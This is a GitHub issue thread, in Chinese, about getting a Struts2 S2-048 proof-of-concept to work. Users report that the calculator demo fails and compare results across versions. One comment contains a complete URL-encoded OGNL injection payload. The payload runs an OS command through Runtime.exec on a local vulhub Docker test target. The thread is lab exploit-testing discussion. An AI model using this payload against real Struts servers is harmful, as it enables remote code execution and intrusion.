Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

弹不出计算器 #2

Open
abay123 opened this issue Aug 23, 2018 · 4 comments
Open

弹不出计算器 #2

abay123 opened this issue Aug 23, 2018 · 4 comments

Comments

@abay123
Copy link

abay123 commented Aug 23, 2018

可以执行计算可是弹计算器就不行
@Bi3g0
Copy link

Bi3g0 commented Aug 23, 2018

Me too~

@hy-nk
Copy link

hy-nk commented Aug 23, 2018

貌似poc需要改造
https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg

@downtown12
Copy link

如果是用vulhub/struts2-048的docker,docker是linux环境,执行命令的话用仓库主人jas502n 给的linux的PoC :P

http://localhost:58080/struts2-showcase/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email protected]@getRuntime%28%29.exec%28%27touch /tmp/fgetdapain%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%[email protected]@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action

@abay123
Copy link
Author

abay123 commented Aug 26, 2018

不是的 这个poc还是用不了 .5的版本都会返回空值,只有.3的版本中有一个可以

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@downtown12 @Bi3g0 @hy-nk @abay123